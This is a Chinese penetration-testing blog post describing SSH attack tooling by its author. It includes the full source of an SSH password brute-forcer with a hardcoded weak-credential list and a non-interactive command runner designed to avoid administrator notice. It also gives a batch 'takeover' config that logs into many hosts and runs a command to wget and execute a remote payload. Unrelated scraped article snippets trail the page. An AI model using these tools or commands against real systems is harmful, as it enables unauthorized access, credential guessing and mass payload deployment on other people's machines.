0x000 目录

1.Kali开启SSH

2.SSH连接工具优缺点

3.渗透专用SSH连接工具

4.ssh执行cmd源码

5.批量SSH密码破解

6.SSH批量上控

7.相关工具下载

0x001 SSH配置

  1. 1.打开文件 etc/ssh/sshd_config
  2.  
  3. 2.添加permitrootlogin yes
  4.  
  5. 3.将#PasswordAuthentication yes的注释去掉

 0x002 重启ssh服务

  1. /etc/init.d/ssh restart
  2.  
  3. /etc/init.d/ssh stop (为了安全测试完ssh工具后可将其关闭)

0x003 SSH连接

1.sshshell交互式连接

  1. sshshell.exe 192.168.1.106 root toor

sshshell.exe 单文件交互式SSH连接工具(优点类似putty可保持会话,缺点也类似putty保持连接)

以前我没写有人说你要是加上保持会话功能比较好,说话的语气像是这个很难你没能力实现一样

搞渗透为了隐蔽才没让其保持连接,不是没能力,你要是正常连接网上工具很多功能还强大的很

不过对我来说很多功能用不到,而且很多工具又大又需要安装过于麻烦,所以我顺手写了这工具

使用putty或网上其它SSH管理工具连接目标机,管理员均可看到攻击者一直在连接

有些人连接SSH去操作没多久,IP被BAN还不知道什么原因

安服的或许无所谓,毕竟都是授权的,直接扛电脑去接入内网搞

真正从事渗透的,你不专业的操作没被发现,只能说管理员很蠢

2.sshcmd 非交互式SSH连接

渗透专版SSH连接工具GUI版,命令行版为sshcmd.exe非交互

优点都是执行完命令立即注销会话(即目标机看不到网络连接)

sshcmd命令行非交互式,python版编译的很大9M(大家可自行编译不同PY或依赖版本可能会更小,以前我编译的才6M)

也可用该工具验证密码是否正确,比sshtest要好,毕竟直接可看到是否可执行CMD命令

3.sshtest密码验证

  1. sshtest.exe 192.168.1.106 22 root toor

4.K8Cscan批量验证SSH密码

此功能可使用Ladon SshScan模块代替,更简单易用

0.将Cscan.exe Cscan.ini sshcrack.exe放置同一目录

Cscan.ini内容如下

1.爆破弱口令(当前无密码或已获取多个帐密)

  1. [Cscan]
  2. exe=sshcrack.exe
  3. arg=$ip$ 22 "" "" -crack

2.验证一个已知密码(快速检测内网其它机器是否使用同一帐密)

  1. [Cscan]
  2. exe=sshcrack.exe
  3. arg=$ip$ 22 root k8gege -test

 3.Cscan扫描单个C段/B段/A段机器

  1. cscan 192.168.1.108 (单个IP)
  2. cscan 192.168.1.108/24 (C段)
  3. cscan 192.168.1.108/16 (B段)
  4. cscan 192.168.1.108/8 (A段)

4.Cscan批量IP/批量C段/批量B段扫描

新建 ip24.txt或ip16.tx或ip.txt 文件,然后输入Cscan即可(无需其它参数)

以下Cscan.ini不指定端口,因通过K8portscan识别出来非22端口

不指定端口意味着ip.txt里需要填写上对应SSH端口

需将图中的sshtest.exe改成sshcrack.exe

0x004 sshcmd源码

  1. import paramiko
  2. import sys
  3. print("sshcmd 1.0")
  4. print("by k8gege")
  5. ssh = paramiko.SSHClient()
  6. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  7. ssh.connect(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])
  8. stdin, stdout, stderr = ssh.exec_command(sys.argv[5])
  9. print stdout.read()
  10. ssh.close()

0x005 sshcrack源码

[原创]内网SSH密码爆破工具sshcrack(配合Cscan批量弱口令检测)

https://www.cnblogs.com/k8gege/p/10995625.html

  1. #sshcrack 1.0
  2. #author: k8gege
  3. #https://www.cnblogs.com/k8gege
  4. #https://github.com/k8gege
  5. import paramiko
  6. import sys
  7. import logging
  8.  
  9. ssh = paramiko.SSHClient()
  10. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  11. logging.raiseExceptions=False
  12. def checkSSH(host,port,user,pwd):
  13. try:
  14. ssh.connect(host,port,user,pwd)
  15. print host+' '+port+' '+user+' '+pwd+' LoginOK'
  16. except:
  17. pass
  18. host=sys.argv[1]
  19. port=sys.argv[2]
  20. user=sys.argv[3]
  21. pwd=sys.argv[4]
  22. type=sys.argv[5]
  23. if type=='-test':
  24. checkSSH(host,port,user,pwd)
  25. elif type=='-crack':
  26. checkSSH(host,port,'root','123456')
  27. checkSSH(host,port,'root','cisco')
  28. checkSSH(host,port,'root','Cisco')
  29. checkSSH(host,port,'admin','123456')
  30. checkSSH(host,port,'cisco','123456')
  31. checkSSH(host,port,'cisco','cisco')
  32. checkSSH(host,port,'Cisco','Cisco')
  33. checkSSH(host,port,'cisco','cisco123')
  34. checkSSH(host,port,'admin','admin')
  35. checkSSH(host,port,'root','Admin')
  36. checkSSH(host,port,'root','toor')
  37. checkSSH(host,port,'root','Admin123')
  38. checkSSH(host,port,'root','system')
  39. checkSSH(host,port,'root','system123')
  40. checkSSH(host,port,'root','System')
  41. checkSSH(host,port,'root','System123')
  42. checkSSH(host,port,'root','Admin123!@#')
  43. checkSSH(host,port,'root','root123!@#')
  44. checkSSH(host,port,'root','root2019')
  45. checkSSH(host,port,'root','root2018')
  46. checkSSH(host,port,'root','root2017')
  47. checkSSH(host,port,'root','root2016')
  48. checkSSH(host,port,'root','root2015')
  49. checkSSH(host,port,'root','root2014')
  50. checkSSH(host,port,'root','root2013')
  51. checkSSH(host,port,'root','root2012')
  52. else:
  53. checkSSH(host,port,user,pwd)

0x006 Linux批量上控

通过调用sshcmd.exe可实现批量验证SSH密码或者批量上控

详见: [教程]K8Cscan调用外部程序例子(Win/Linux批量上控)

ip.txt内容  格式: IP 端口 用户 帐密

  1. 192.168.1.8 22 root k8123456
  2. 192.168.1.100 444 root admin123
  3. 10.1.11.5 22 root p@walod
  4. 172.3.4.6 22 root test

Cscan.ini内容

  1. [Cscan]
  2. exe=sshcmd.exe
  3. arg=$ip$ "wget http://k8gege.github.io/poc.out&&./poc.out"

0x007 工具下载

https://github.com/k8gege/sshshell

https://github.com/k8gege/K8tools

https://github.com/k8gege/K8CScan

[原创]内网渗透专用SSH连接工具sshcmd/sshshell/ssh密码破解以及Kali开启SSH的更多相关文章

  1. [原创]内网渗透JSP webSehll连接工具

    工具: JspShellExec编译: VS2012  C# (.NET Framework v2.0)组织: K8搞基大队[K8team]作者: K8拉登哥哥博客: http://qqhack8.b ...

  2. 5.如何使主机和虚拟机IP处于同一网段(内网渗透专用)

    先说一下正常流程: 1.打开虚拟机网络设置选项,选择桥接模式(Bridged)[如果是Kali 2.0的话,执行第一步后就OK了(90%)] 2.打开Kali里面的网络设置 3.设置一个ip4或者ip ...

  3. 如何使主机和虚拟机IP处于同一网段(内网渗透专用)

    先说一下正常流程: 1.打开虚拟机网络设置选项,选择桥接模式(Bridged)[如果是Kali 2.0的话,执行第一步后就OK了(90%)] 2.打开Kali里面的网络设置 3.设置一个ip4或者ip ...

  4. [原创]内网SSH密码爆破工具sshcrack(配合Cscan批量弱口令检测)

    0x000 前言 sshcrack是一个命令行下的SSH密码爆破工具,适用于内渗中SSH密码检测 当然也可用于外网SSH密码爆破,支持Windows/Linux,其它系统未测.Tip1 0x001 目 ...

  5. [原创]K8 cping 3.0大型内网渗透扫描工具

    [原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...

  6. [原创]K8 Cscan 3.6大型内网渗透自定义扫描器

    前言:无论内网还是外网渗透信息收集都是非常关键,信息收集越多越准确渗透的成功率就越高但成功率还受到漏洞影响,漏洞受时效性影响,对于大型内网扫描速度直接影响着成功率漏洞时效性1-2天,扫描内网或外网需1 ...

  7. [原创]K8飞刀20150725 支持SOCKS5代理(内网渗透)

    工具: K8飞刀编译: 自己查壳组织: K8搞基大队[K8team]作者: K8拉登哥哥博客: http://qqhack8.blog.163.com发布: 2015/7/26 3:41:11 简介: ...

  8. frp内网渗透实现ssh外网访问家里树莓派(树莓派raspbian系统+腾讯云contos7)

    只有信用卡大小的它,同时也是一台功能完备的电脑(树莓派),把内网能玩的功能都玩了个遍,自然就有了外网访问这台树莓派的需求.一样也是查阅了无数文章,研究了无数个方案,最终试验成功用FRP实现了内网穿透, ...

  9. 记录一次坎坷的linux内网渗透过程瞎折腾的坑

    版权声明:本文为博主的原创文章,未经博主同意不得转载. 写在前面 每个人都有自己的思路和技巧,以前遇到一些linux的环境.这次找来一个站点来进行内网,写下自己的想法 目标环境 1.linux  2. ...

随机推荐

  1. Ahead-of-time compilation

    https://en.wikipedia.org/wiki/Ahead-of-time_compilation

  2. ssemble JavaBeans components into an application without having to write any code

    https://docs.oracle.com/javase/tutorial/javabeans/ https://docs.oracle.com/javase/tutorial/javabeans ...

  3. thinkphp权限管理Rbac实例

    首先,先建立Rbac那五张表(用户表,角色表,节点表,权限表,角色-用户表),后面四张可以在thinkphp中Rbac类里直接复制. 第二步,根据需求往那五张表里插入数据,注意:节点表里的节点名称一定 ...

  4. CodeSign相关

    要让苹果App在真机上跑,需要私钥(PrivateKey),证书(Certificate)和描述文件(Provisioning Profile). (一) 安全基础: 1.非对称加密: 2.Hash码 ...

  5. 【Advanced Windows Phone Programming】在windows phone 8中解码mp3 和编码pcm

    转眼间不做wp开发,投身于php事业已然一年了,转身看到8.1的发布,俨然一片欣欣向荣的景象,但是开发社区却没比一年前有过多大的提高,这并不是一个好现象,遂在git上开源了之前音频处理库,希望能对社区 ...

  6. Android 启动过程介绍【转】

    本文转载自:http://blog.csdn.net/yangwen123/article/details/8023654 一般开机过程大致可以分为三个大阶段: 1. OS级别,由bootloader ...

  7. hdu1078 FatMouse and Cheese —— 记忆化搜索

    题目链接:http://acm.hdu.edu.cn/showproblem.php?pid=1078 代码1: #include<stdio.h>//hdu 1078 记忆化搜索 #in ...

  8. 配置Nginx四层负载均衡

    nginx 支持TCP转发和负载均衡的支持 实现下面的架构: 看配置: #user nobody; worker_processes 1; #error_log logs/error.log; #er ...

  9. C#开发遇到的常见问题及知识点

    今天遇到的类型初始值设定项引发异常的原因是:类没有添加[Serializable]属性. this.DialogResult = System.Windows.Forms.DialogResult.O ...

  10. C# GDI生成清晰【高质量】图片

    对于GDI+,在正常的操作,Bitmap,Graphcis,DrawImage或者DrawString ,生成图片的话,会产生很多杂点,或者是图片质量不稳定.尤其是在读取图片后,生成缩略图之后,文件会 ...